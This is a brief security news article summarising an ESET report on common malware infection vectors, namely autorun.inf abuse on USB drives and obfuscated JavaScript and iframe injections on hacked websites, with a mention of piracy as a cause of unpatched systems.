February 12, 2016

Top malware threats of last year included autorun and malicious Javascript

usb-flash-drive(LiveHacking.Com) –  ESET has released a new report looking back at the top attack vectors used by malware to infect PCs in 2012. The top three vectors where the autorun.inf file, obfuscated Javascript and iframe injections. Together these three accounted for almost 15% of the ways that malware found its way onto PCs.

Autorun.inf is a special file placed on removal media (like USB flash disks) that tells Windows what file to run when the media is inserted into the computer. Many different types of malware copy themselves onto any removable media present and change the autorun.inf file to make sure that the malware is run when the media is inserted into a machine. It is a popular way for malware to infect computers that are not connected to the Internet. A recent report by the USA’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) revealed that two power generation facilities became infected with malware via USB flash drives that were being used inside the plants. It is also the method believed to have been used to infect Iran’s nuclear program with Stuxnet. In total 5% of malware infections detected by ESET’s Live Grid was spread via the autorun.inf file.

Although Microsoft disabled Autorun on Windows XP and Vista, to prevent malware infections, nearly two years ago (back in February 2011), ZDNet’s  Dancho Danchev is hypothesizing that the number of infections that happen via Autorun is still high because of software piracy. Basically users are running a pirated/outdated version of Windows. These installations aren’t being updated because of Microsoft’s Genuine Advantage program and so remain with Autorun enabled. The piracy problem was also reiterated by Symantec when it speculated that “the lack of patching due to piracy may be a contributory factor to high infection rates in those countries.”

Another 8% of infections came via hacked webpages with some kind of malicious intent. When a web page is hacked the attacker can alter the HTML to insert Javascript or an iframe that redirects the browser to a URL where malware is hosted or to start a drive by download. Normally any injected Javascript is obfuscated.

“Since poisoned web sites and scripts are an ongoing and regrettable but inevitable part of the threatscape, it’s not surprising that HTML/Iframe.B and HTML/Scrinject.B are still with us…” wrote David Harley, a senior research fellow at ESET.